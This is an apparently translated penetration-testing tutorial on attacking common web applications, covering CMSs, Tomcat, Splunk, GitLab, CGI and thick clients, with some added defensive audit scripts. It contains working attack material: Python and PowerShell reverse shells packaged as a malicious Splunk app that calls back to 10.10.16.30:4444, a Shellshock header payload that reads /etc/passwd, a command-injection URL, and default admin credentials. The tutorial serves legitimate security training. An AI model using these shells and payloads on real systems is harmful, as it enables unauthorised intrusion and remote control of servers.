
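Penetration Testing: Attacking Common Web Applications

This article discusses attack techniques against common web applications. It is not exhaustive, because there are far too many web applications to cover them all, but the ideas behind these techniques are worth borrowing, so I have recorded them here in the hope that they help. The main contents are:

1. Quickly triaging web applications

2. CMS web application cases

3. Server web application cases

4. Enterprise IT operations application cases

5. Enterprise client-facing web application cases

6. Gateway interface application cases

7. Enterprise custom client application cases

8. Enterprise IT development platform application cases

9. Vulnerabilities in other applications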

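Category	Applications
Web Content Management	Joomla, Drupal, WordPress, DotNetNuke, etc.
Application Servers	Apache Tomcat, Phusion Passenger, Oracle WebLogic, IBM WebSphere, etc.
Security Information and Event Management (SIEM)	Splunk, Trustwave, LogRhythm, etc.
Network Management	PRTG Network Monitor, ManageEngine OpManager, etc.
IT Management	Nagios, Puppet, Zabbix, ManageEngine ServiceDesk Plus, etc.
Software Frameworks	JBoss, Axis2, etc.
Customer Service Management	osTicket, Zendesk, etc.
Search Engines	Elasticsearch, Apache Solr, etc.
Software Configuration Management	Atlassian JIRA, GitHub, GitLab, Bugzilla, Bugsnag, Bitbucket, etc.
Software Development Tools	Jenkins, Atlassian Confluence, phpMyAdmin, etc.
Enterprise Application Integration	Oracle Fusion Middleware, BizTalk Server, Apache ActiveMQ, etc.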

Application	Abuse Info
Axis2	This can be abused similar to Tomcat. We will often actually see it sitting on top of a Tomcat installation. If we cannot get RCE via Tomcat, it is worth checking for weak/default admin credentials on Axis2. We can then upload a webshell in the form of an AAR file (Axis2 service file). There is also a Metasploit module that can assist with this.
Websphere	Websphere has suffered from many different vulnerabilities over the years. Furthermore, if we can log in to the administrative console with default credentials such as system:manager we can deploy a WAR file (similar to Tomcat) and gain RCE via a web shell or reverse shell.
Elasticsearch	Elasticsearch has had its fair share of vulnerabilities as well. Though old, we have seen this before on forgotten Elasticsearch installs during an assessment for a large enterprise (and identified within 100s of pages of EyeWitness report output). Though not realistic, the Hack The Box machine Haystack features Elasticsearch.
Zabbix	Zabbix is an open-source system and network monitoring solution that has had quite a few vulnerabilities discovered such as SQL injection, authentication bypass, stored XSS, LDAP password disclosure, and remote code execution. Zabbix also has built-in functionality that can be abused to gain remote code execution. The HTB box Zipper showcases how to use the Zabbix API to gain RCE.
Nagios	Nagios is another system and network monitoring product. Nagios has had a wide variety of issues over the years, including remote code execution, root privilege escalation, SQL injection, code injection, and stored XSS. If you come across a Nagios instance, it is worth checking for the default credentials nagiosadmin:PASSW0RD and fingerprinting the version.
WebLogic	WebLogic is a Java EE application server. At the time of writing, it has 190 reported CVEs. There are many unauthenticated RCE exploits from 2007 up to 2021, many of which are Java Deserialization vulnerabilities.
Wikis/Intranets	We may come across internal Wikis (such as MediaWiki), custom intranet pages, SharePoint, etc. These are worth assessing for known vulnerabilities but also searching if there is a document repository. We have run into many intranet pages (both custom and SharePoint) that had a search functionality which led to discovering valid credentials.
DotNetNuke	DotNetNuke (DNN) is an open-source CMS written in C# that uses the .NET framework. It has had a few severe issues over time, such as authentication bypass, directory traversal, stored XSS, file upload bypass, and arbitrary file download.
vCenter	vCenter is often present in large organizations to manage multiple instances of ESXi. It is worth checking for weak credentials and vulnerabilities such as this Apache Struts 2 RCE that scanners like Nessus do not pick up. This unauthenticated OVA file upload vulnerability was disclosed in early 2021, and a PoC for CVE-2021-22005 was released during the development of this module. vCenter comes as both a Windows and a Linux appliance. If we get a shell on the Windows appliance, privilege escalation is relatively simple using JuicyPotato or similar. We have also seen vCenter already running as SYSTEM and even running as a domain admin! It can be a great foothold in the environment or be a single source of compromise.

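Quickly Triaging Web Applications

Enumerating application data sources quickly with Nmap

# Enumerate a website with Nmap and produce raw data for EyeWitness or other tools
nmap -p 80 --script http-enum --script-args http-enum.fingerprintfile=<path_to_your_dict> -oX output.xml <target>

# Enumerate websites with Nmap and produce an XML data source for Aquatone
nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL list.target

Taking quick screenshots of HTTP pages with Aquatone from the Nmap data

# Have Aquatone build the HTTP screenshot report
cat web_discovery.xml | ./aquatone -nmap

Taking quick screenshots of HTTP pages with EyeWitness from the Nmap data

eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness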

CMS Web Application Cases

 WordPress

# robots.txt file
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

# Sensitive directories referenced in the page
wp-content/plugins
wp-content/themes

# Search the page for WordPress
curl -s http://blog.inlanefreight.local | grep WordPress
curl -s http://blog.inlanefreight.local | grep themes
curl -s http://blog.inlanefreight.local | grep plugins

<meta name="generator" content="WordPress 5.8" />

# For the related libraries, browse the directory structure directly
# Build a specialised wordlist for dirsearch
# Enumerate plugins and parameters as thoroughly as possible; we will find many different things

Automated WordPress scanning tool

GitHub - wpscanteam/wpscan: WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites. Contact us via contact@wpscan.com

Attacking WordPress

1. WordPress has a very large plugin ecosystem, and those plugins contain a large number of vulnerabilities.

Joomla

# robots.txt file
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/

# Path enumeration
/README.txt
/administrator/manifests/files/joomla.xml
/plugins/system/cache/cache.xml

Automated Joomla scanning

GitHub - SamJoan/droopescan: A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.

GitHub - drego85/JoomlaScan: A free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan.

Attacking Joomla

1. Joomla's extension ecosystem contains a large number of vulnerabilities, so scan the installed extensions first

Drupal

# Discovering Drupal
curl -s http://drupal.inlanefreight.local | grep Drupal

# Checking version information
curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 ""
curl -s http://drupal.inlanefreight.local/CHANGELOG.txt

Automated Drupal scanning

cmundy2@htb[/htb]$ droopescan scan drupal -u http://drupal.inlanefreight.local

Attacking Drupal

1. Attack Drupal's modules

2. Attack Drupal core

Server Web Application Cases

 Tomcat

curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat

# Paths that exist
/manager/html
/docs/

Tomcat background

# Default directory structure
├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
│   │       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost

webapps/customapp
├── images
├── index.jsp
├── META-INF
│   └── context.xml
├── status.xsd
└── WEB-INF
    ├── jsp
    │   └── admin.jsp
    ├── web.xml
    ├── lib
    │   └── jdbc_drivers.jar
    └── classes
        └── AdminServlet.class

# Servlet structure in web.xml
<web-app>
  <servlet>
    <servlet-name>AdminServlet</servlet-name>
    <servlet-class>com.inlanefreight.api.AdminServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>AdminServlet</servlet-name>
    <url-pattern>/admin</url-pattern>
  </servlet-mapping>
</web-app>

Here com.inlanefreight.api.AdminServlet means that the servlet's class is located at
classes/com/inlanefreight/api/AdminServlet.class

# Tomcat's tomcat-users.xml contains usernames and passwords and controls access to the manager pages
<?xml version="1.0" encoding="UTF-8"?>

<SNIP>

<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary.

  Built-in Tomcat manager roles:
    - manager-gui    - allows access to the HTML GUI and the status pages
    - manager-script - allows access to the HTTP API and the status pages
    - manager-jmx    - allows access to the JMX proxy and the status pages
    - manager-status - allows access to the status pages only

  The users below are wrapped in a comment and are therefore ignored. If you
  wish to configure one or more of these users for use with the manager web
  application, do not forget to remove the <!.. ..> that surrounds them. You
  will also need to set the passwords to something appropriate.
-->

<SNIP>

<!-- user manager can access only manager section -->
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />

<!-- user admin can access manager and admin section both -->
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />

</tomcat-users>

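Attacking Tomcat

1. The Tomcat server itself has vulnerabilities

2. Obtaining an administrator account is enough to achieve RCE by uploading a WAR package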
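A defender-side audit for the tomcat-users.xml weakness shown above, added here as an example and not taken from the original article: it parses the file and reports accounts that hold a Manager or Host Manager role with a default-style password. The weak-password list, the 12-character threshold and the function names are assumptions for illustration.

```python
import xml.etree.ElementTree as ET

# Roles that allow deploying applications or administering hosts.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}
# Illustrative list of default-style passwords (assumption; extend per policy).
WEAK_PASSWORDS = {"", "tomcat", "admin", "manager", "password", "s3cret", "changeit"}
MIN_LENGTH = 12  # assumed minimum length for a service credential

# Constructed sample modelled on the file shown in the article.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <!-- <user username="ignored" password="ignored" roles="manager-gui" /> -->
  <role rolename="manager-gui" />
  <user username="tomcat" password="tomcat" roles="manager-gui" />
  <role rolename="admin-gui" />
  <user username="admin" password="admin" roles="manager-gui,admin-gui" />
  <user username="deploy" password="Xk9#vT2q!mR7wLp4" roles="manager-script" />
  <user username="viewer" password="viewer" roles="manager-status" />
</tomcat-users>
"""


def local_name(tag):
    """Strip the XML namespace so namespaced and bare files both parse."""
    return tag.rsplit("}", 1)[-1] if isinstance(tag, str) else ""


def audit_tomcat_users(xml_text):
    """Return one finding per privileged account with a weak password.

    Users wrapped in an XML comment are skipped, exactly as Tomcat skips them.
    """
    findings = []
    for element in ET.fromstring(xml_text).iter():
        if local_name(element.tag) != "user":
            continue
        # Older files use name= instead of username=.
        name = element.get("username") or element.get("name") or ""
        password = element.get("password") or ""
        roles = {r.strip() for r in (element.get("roles") or "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # status-only or custom roles cannot deploy a WAR
        reasons = []
        if password.lower() in WEAK_PASSWORDS:
            reasons.append("well-known default password")
        if name and password.lower() == name.lower():
            reasons.append("password equals username")
        if len(password) < MIN_LENGTH:
            reasons.append("shorter than %d characters" % MIN_LENGTH)
        if reasons:
            findings.append({"user": name, "roles": privileged, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE):
        print("%(user)s %(roles)s: %(reasons)s" % finding)
```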

Jenkins

# Logo
An elderly butler

Attacking Jenkins

1. Attack Jenkins itself

2. With a Jenkins account, the /script feature can be abused to achieve RCE

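 IIS Server

Enumerating IIS servers

IIS servers are enumerated differently from other servers, so the method is described in detail here.

1. The tilde (~) lets us enumerate directory names one character at a time

### Enumerating short names on IIS with the tilde
http://example.com/~s
http://example.com/~se
http://example.com/~sec
...
http://example.com/~secret~1

At this point we have discovered the /secret~1/ directory. In principle this is similar to tab completion on Linux: ~1 is the first file that would appear after pressing tab. With this information we can quickly filter our large wordlist down to the entries that match the prefix, and so quickly brute-force the files under the directory.

Automated tool: https://github.com/irsdl/IIS-ShortName-Scanner

Discovering IIS servers

1. Scan with nmap, or probe with nc and inspect the response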

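Enterprise IT Operations Application Cases

 Splunk

# An nmap scan combined with EyeWitness finds it directly
# The free version does not require a password
https://10.129.201.50:8000/en-US/app/launcher/home

Attacking Splunk

1. Get into the Splunk admin interface, which can run Python scripts that connect back

2. A Splunk server can distribute specific scripts in bulk to machines that have the Splunk Universal Forwarder installed, that is, the machines that collect logs.

Abusing Splunk admin functionality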

### Structure of the uploaded archive: bin contains the attack scripts, and default contains the inputs.conf configuration file.
cmundy2@htb[/htb]$ tree splunk_shell/
splunk_shell/
├── bin
└── default

tar -cvzf updater.tar.gz splunk_shell/
'''
splunk_shell/
splunk_shell/bin/
splunk_shell/bin/rev.py
splunk_shell/bin/run.bat
splunk_shell/bin/run.ps1
splunk_shell/default/
splunk_shell/default/inputs.conf
'''

cmundy2@htb[/htb]$ cat inputs.conf
'''
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
'''

cat run.bat
'''
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit
'''

cat rev.py
'''
export RHOST="10.10.16.30";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
'''

cat run.ps1
'''
$LHOST = "10.10.16.30"; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
'''

# Compress the malicious files
$ tar -cvzf updater.tar.gz splunk_shell/

# Upload it!
https://10.129.201.50:8000/en-US/manager/search/apps/local
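From the defender's side, the technique above leaves an enabled [script://...] stanza in an app's inputs.conf on the server and on every forwarder the app is pushed to. The following is an added example, not part of the original article: it parses inputs.conf text and lists enabled scripted inputs that are not on an allowlist. The allowlist, the sample stanzas and the function names are assumptions.

```python
import re
from pathlib import Path

STANZA = re.compile(r"^\[(?P<name>[^\]]+)\]$")
TRUE_VALUES = {"1", "true", "t", "yes", "y"}

# Constructed sample: the two stanzas from the article plus benign ones.
SAMPLE = r"""
[monitor:///var/log/auth.log]
sourcetype = linux_secure

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

[script://./bin/old_collector.sh]
disabled = 1
interval = 300

[script://./bin/inventory.sh]
interval = 3600
"""


def parse_conf(text):
    """Parse Splunk .conf text into {stanza: {key: value}}."""
    stanzas, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = STANZA.match(line)
        if header:
            current = stanzas.setdefault(header.group("name"), {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip()
    return stanzas


def script_path(stanza_name):
    """Normalise script://./bin/x and script://.\\bin\\x to bin/x."""
    path = stanza_name[len("script://"):].replace("\\", "/")
    while path.startswith("./"):
        path = path[2:]
    return path


def enabled_scripted_inputs(text, allowlist=frozenset()):
    """List enabled scripted inputs whose script is not on the allowlist."""
    findings = []
    for name, settings in parse_conf(text).items():
        if not name.lower().startswith("script://"):
            continue
        if settings.get("disabled", "0").lower() in TRUE_VALUES:
            continue
        path = script_path(name)
        if path in allowlist:
            continue
        findings.append({
            "script": path,
            "interval": settings.get("interval", "(default)"),
            "sourcetype": settings.get("sourcetype", ""),
        })
    return findings


def audit_apps(splunk_home, allowlist=frozenset()):
    """Walk etc/apps/<app>/{default,local}/inputs.conf under a Splunk home."""
    report = {}
    for conf in sorted((Path(splunk_home) / "etc" / "apps").glob("*/*/inputs.conf")):
        if conf.parent.name not in {"default", "local"}:
            continue
        hits = enabled_scripted_inputs(conf.read_text(errors="replace"), allowlist)
        if hits:
            report[str(conf)] = hits
    return report


if __name__ == "__main__":
    for hit in enabled_scripted_inputs(SAMPLE, allowlist={"bin/inventory.sh"}):
        print(hit)
```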

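 PRTG Network Monitor

1. PRTG may be running on any port, so use EyeWitness to review the pages

2. PRTG has vulnerabilities; after logging in to the admin console they can lead to RCE

Discovering PRTG

Attacking PRTG

### Metasploit (msf) can handle this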

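Enterprise Client-Facing Web Application Cases

 osTicket

Discovering osTicket

### The OSTSESSID cookie is a clue
### "powered by osTicket" appears in the page
### The page contains "Support Ticket System"

Attacking osTicket

### LFI
### SQLI
### FileUpload
### XSS
### SSRF
### The conversations inside the ticketing system are also a focus for us, for example exchanges between the server administrator and anyone else.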

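GitLab

Discovering GitLab

### Login page
http://gitlab.inlanefreight.local:8081/users/sign_in

### GitLab version page; it requires login, and an account can be registered
http://gitlab.inlanefreight.local:8081/help

### Explore each module's help page to confirm the version
We can explore every page linked from groups, snippets, and help in the top left

### Sensitive information that may exist on GitLab
Article: https://tillsongalloway.com/finding-sensitive-information-on-github/index.html

Attacking GitLab

### Username enumeration
msf

### Remote code execution
msf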

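Gateway Interface Application Cases

 Tomcat CGI

Discovering Tomcat CGI

### After nmap finds Tomcat, browse the /cgi/ directory
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.cmd

# Usable extensions
.cmd
.bat

Attacking CGI

### Command injection
/welcome.bat?&whoami

### Shellshock can be tried against any CGI that is discovered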

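Attacking CGI with Shellshock

The Shellshock vulnerability affects older versions of Bash. An attacker can use it to inject malicious commands through environment variables and thereby execute operating system commands. The flaw stems from Bash mishandling function definitions in environment variables: when a function is passed as an environment variable, Bash wrongly executes the commands that follow the function definition.

Vulnerability example and how it works

Suppose we have an environment variable y whose value is a Bash function definition followed by a command: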

$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

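Explanation:

  1. Function definition:
    The y='() { :;};' part defines an empty function named y. The function does nothing except return exit code 0 (that is, it does nothing and exits normally).

    In Bash, a function definition is written with (), for example: y() { ... }

  2. Malicious command:
    echo vulnerable-shellshock is the malicious command placed in the environment variable; it gets executed after the function definition.

  3. Execution:
    bash -c "echo not vulnerable" starts a new Bash child process and runs echo not vulnerable

Why the vulnerability occurs:

  • Older versions of Bash mistakenly parse the contents of the environment variable as a function definition and go on to execute the commands that follow the definition.
  • y is defined as an empty function (() { :;};), but echo vulnerable-shellshock follows immediately after the function, so Bash wrongly executes that command.

Example

# In a CGI context every request header becomes a bash environment variable, so we can try them one by one. In principle the payload cannot be encoded, because bash does not decode anything; if a bypass is needed, base64 can be used.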
User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd
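Because the payload has to reach bash undecoded, the function-definition prefix is visible in whatever the web server logs. The following detection sketch is an added example, not part of the original article: it scans Apache/Nginx combined-format access-log lines for that prefix in the request line, Referer and User-Agent. The log lines are constructed and the function names are assumptions.

```python
import re

# Vulnerable bash treated an environment value starting with "() {" as a
# function definition. The pattern is deliberately a little broader
# (optional whitespace, anywhere in the field) to catch sloppy variants.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")

# A quoted log field; the server writes embedded quotes as \" .
QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>' + QUOTED + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"'
)

# Constructed sample lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2025:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.66 - - [10/Jan/2025:10:00:05 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 941 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '192.0.2.66 - - [10/Jan/2025:10:00:09 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" '
    '500 0 "()  {:;}; echo probe" "curl/8.0"',
    '192.0.2.20 - - [10/Jan/2025:10:00:12 +0000] "GET /docs/func() HTTP/1.1" '
    '404 196 "-" "Mozilla/5.0"',
    'not a combined-format line',
]


def scan_access_log(lines):
    """Return one hit per log line carrying a function-definition prefix."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = COMBINED.match(line)
        if not match:
            continue  # unparseable lines are skipped, not guessed at
        fields = [name for name in ("request", "referer", "agent")
                  if FUNC_DEF.search(match.group(name))]
        if not fields:
            continue
        parts = match.group("request").split(" ")
        hits.append({
            "line": number,
            "ip": match.group("ip"),
            "path": parts[1] if len(parts) > 1 else "",
            "status": int(match.group("status")),
            "fields": fields,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Access logs in this format record only the request line, Referer and User-Agent; payloads carried in other headers need proxy or WAF logging to be seen.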

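Enterprise Custom Client Application Cases

 Thick Client Applications

Thick clients are essentially app-like programs that take on much of the logic and decision-making locally to reduce the load on the server. That means we can reverse-engineer the client to understand much of its local code and logic, and from there find vulnerabilities or hardcoded credentials. This part only quotes some of the Hack The Box material and mainly introduces the tools that can be used; the essence of reverse engineering lies elsewhere, and since I do not know reverse engineering myself, I will not go into more detail. Those who are interested can head over to HTB Academy.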

Information Gathering

In this step, penetration testers have to identify the application architecture, the programming languages and frameworks that have been used, and understand how the application and the infrastructure work. They also need to identify the technologies used on the client and server sides and find entry points and user inputs. Testers should also look for common vulnerabilities like the ones we mentioned earlier at the end of the About section. The following tools will help us gather information.

CFF Explorer	Detect It Easy	Process Monitor	Strings

Client Side attacks

Although thick clients perform significant processing and data storage on the client side, they still communicate with servers for various tasks, such as data synchronization or accessing shared resources. This interaction with servers and other external systems can expose thick clients to vulnerabilities similar to those found in web applications, including command injection, weak access control, and SQL injection.

Sensitive information like usernames and passwords, tokens, or strings for communication with other services, might be stored in the application's local files. Hardcoded credentials and other sensitive information can also be found in the application's source code, thus Static Analysis is a necessary step while testing the application. Using the proper tools, we can reverse-engineer and examine .NET and Java applications including EXE, DLL, JAR, CLASS, WAR, and other file formats. Dynamic analysis should also be performed in this step, as thick client applications store sensitive information in the memory as well.

Ghidra	IDA	OllyDbg	Radare2
dnSpy	x64dbg	JADX	Frida

Network Side Attacks

If the application is communicating with a local or remote server, network traffic analysis will help us capture sensitive information that might be transferred through HTTP/HTTPS or TCP/UDP connection, and give us a better understanding of how that application is working. Penetration testers that are performing traffic analysis on thick client applications should be familiar with tools like:

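Wireshark	tcpdump	TCPView	Burp Suite

EXE scenario

1. Use Process Monitor to watch the process, paying attention to registry locations and where files are created. Once the file-creation location is found, change the user permissions on that directory so the files cannot be deleted.

2. Use OllyDbg to disassemble the program and look for content that can be decrypted; for example, whatever language turns out to have been used, there is a matching decompiler.

3. Look for hardcoded values inside the files

4. Sometimes DLL files need to be decompiled

Techniques
Running strings64 on a memory block that is a DOS MZ executable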

If we double-click on it, we will see the magic bytes MZ in the ASCII column that indicates that the file is a DOS MZ executable.


Let's return to the Memory Map pane, then export the newly discovered mapped item from memory to a dump file by right-clicking on the address and selecting Dump Memory to File. Running strings on the exported file reveals some interesting information.

C:\> C:\TOOLS\Strings\strings64.exe .\restart-service_00000000001E0000.bin

<SNIP>
"#M
z\V
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName
.NET Framework 4 Client Profile
<SNIP>

Reading the output reveals that the dump contains a .NET executable. We can use De4Dot to reverse .NET executables back to the source code by dragging the restart-service_00000000001E0000.bin onto the de4dot executable.

Cleaning up the .NET file with de4dot before decompiling

de4dot v3.1.41592.3405

Detected Unknown Obfuscator (C:\Users\cybervaca\Desktop\restart-service_00000000001E0000.bin)
Cleaning C:\Users\cybervaca\Desktop\restart-service_00000000001E0000.bin
Renaming all obfuscated symbols
Saving C:\Users\cybervaca\Desktop\restart-service_00000000001E0000-cleaned.bin

Press any key to exit...

Now, we can read the source code of the exported application by dragging and dropping it onto the DnSpy executable.


With the source code disclosed, we can understand that this binary is a custom-made runas.exe with the sole purpose of restarting the Oracle service using hardcoded credentials.

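Decompiling DLL files with dnSpy

With the debugger and .NET assembly editor dnSpy, we can view the source code directly. This tool allows reading, editing, and debugging the source code of .NET assemblies (C# and Visual Basic). Inspecting MultimasterAPI.Controllers -> ColleagueController reveals a database connection string containing the password.

JAR scenario

1. Use jd-gui to decompile the Java code and audit it

Techniques
Saving the decompiled source with jd-gui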

The server filters out the / character from the input. Let's decompile the application using JD-GUI, by dragging and dropping the fatty-client-new.jar onto the jd-gui.


Save the source code by pressing the Save All Sources option in jdgui. Decompress the fatty-client-new.jar.src.zip by right-clicking and selecting Extract files. The file fatty-client-new.jar.src/htb/fatty/client/methods/Invoker.java handles the application features. Reading its content reveals the following code.

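Compiling the Java source

After obtaining the source from jd-gui we can modify it; once the changes are done, the .java files have to be compiled into .class files

C:\> javac -cp <classpath> <java file to compile>
C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java

Packaging into a jar file
jar -cmf <path to the MF file> <name of the jar to create> .
jar -cmf META-INF\MANIFEST.MF traverse.jar .

 Applications that connect to services

 Decompiling DLL files with dnSpy

With the debugger and .NET assembly editor dnSpy, we can view the source code directly. This tool allows reading, editing, and debugging the source code of .NET assemblies (C# and Visual Basic). Inspecting MultimasterAPI.Controllers -> ColleagueController reveals a database connection string containing the password.

Disassembling ELF files with gdb

### Load the ELF file
gdb ./ELF

### Run the file once
gdb-peda$ run

### Set the disassembly flavor and disassemble
gdb-peda$ set disassembly-flavor intel
gdb-peda$ disas main

### Set a breakpoint
gdb-peda$ b *0x5555555551b0

### Run it again
gdb-peda$ run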

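Enterprise IT Development Platform Application Cases

 ColdFusion

Discovering ColdFusion

1. Ports

2. The CFML language

3. /CFIDE/ and /cfdocs/ on port 8500

4. Version information can be viewed in cfdocs

### Ports
Port	Protocol	Description
80	HTTP	Used for non-secure HTTP communication between the web server and the web browser.
443	HTTPS	Used for secure HTTP communication between the web server and the web browser. Encrypts the communication between the web server and the web browser.
1935	RPC	Used for client-server communication. The Remote Procedure Call (RPC) protocol allows a program to request information from another program on a different network device.
25	SMTP	Simple Mail Transfer Protocol (SMTP) is used for sending email.
8500	SSL	Used for server communication over Secure Sockets Layer (SSL).
5500	Server Monitor	Used for remote administration of the ColdFusion server.

### CFML example
<cfquery name="myQuery" datasource="myDataSource">
  SELECT *
  FROM myTable
</cfquery>

### Characteristic directories
/CFIDE/
/cfdocs/
/CFIDE/administrator

Attacking ColdFusion

1. searchsploit lists an RCE

2. searchsploit lists a directory traversal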

Vulnerabilities in Other Applications

LDAP

Discovering LDAP

1. Port 389

Attacking LDAP

LDAP requires a detailed understanding of its functionality. I have not studied this area systematically yet; once I have, I will reorganise this section and update the article. For now it only contains some basic concepts, so stay tuned.

LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory information. A directory is a hierarchical data store that contains information about network resources such as users, groups, computers, printers, and other devices. LDAP provides some excellent functionality:

Functionality	Description
Efficient	Efficient and fast queries and connections to directory services, thanks to its lean query language and non-normalised data storage.
Global naming model	Supports multiple independent directories with a global naming model that ensures unique entries.
Extensible and flexible	This helps to meet future and local requirements by allowing custom attributes and schemas.
Compatibility	It is compatible with many software products and platforms as it runs over TCP/IP and SSL directly, and it is platform-independent, suitable for use in heterogeneous environments with various operating systems.
Authentication	It provides authentication mechanisms that enable users to sign on once and access multiple resources on the server securely.

However, it also suffers some significant issues:

Functionality	Description
Compliance	Directory servers must be LDAP compliant for service to be deployed, which may limit the choice of vendors and products.
Complexity	Difficult to use and understand for many developers and administrators, who may not know how to configure LDAP clients correctly or use it securely.
Encryption	LDAP does not encrypt its traffic by default, which exposes sensitive data to potential eavesdropping and tampering. LDAPS (LDAP over SSL) or StartTLS must be used to enable encryption.
Injection	Vulnerable to LDAP injection attacks, where malicious users can manipulate LDAP queries and gain unauthorised access to data or resources. To prevent such attacks, input validation and output encoding must be implemented.

LDAP is commonly used for providing a central location for accessing and managing directory services. Directory services are collections of information about the organisation, its users, and assets–like usernames and passwords. LDAP enables organisations to store, manage, and secure this information in a standardised way. Here are some common use cases:

Use Case	Description
Authentication	LDAP can be used for central authentication, allowing users to have single login credentials across multiple applications and systems. This is one of the most common use cases for LDAP.
Authorisation	LDAP can manage permissions and access control for network resources such as folders or files on a network share. However, this may require additional configuration or integration with protocols like Kerberos.
Directory Services	LDAP provides a way to search, retrieve, and modify data stored in a directory, making it helpful for managing large numbers of users and devices in a corporate network. LDAP is based on the X.500 standard for directory services.
Synchronisation	LDAP can be used to keep data consistent across multiple systems by replicating changes made in one directory to another.

There are two popular implementations of LDAP: OpenLDAP, an open-source software widely used and supported, and Microsoft Active Directory, a Windows-based implementation that seamlessly integrates with other Microsoft products and services.

Although LDAP and AD are related, they serve different purposes. LDAP is a protocol that specifies the method of accessing and modifying directory services, whereas AD is a directory service that stores and manages user and computer data. While LDAP can communicate with AD and other directory services, it is not a directory service itself. AD offers extra functionalities such as policy administration, single sign-on, and integration with various Microsoft products.

LDAP	Active Directory (AD)
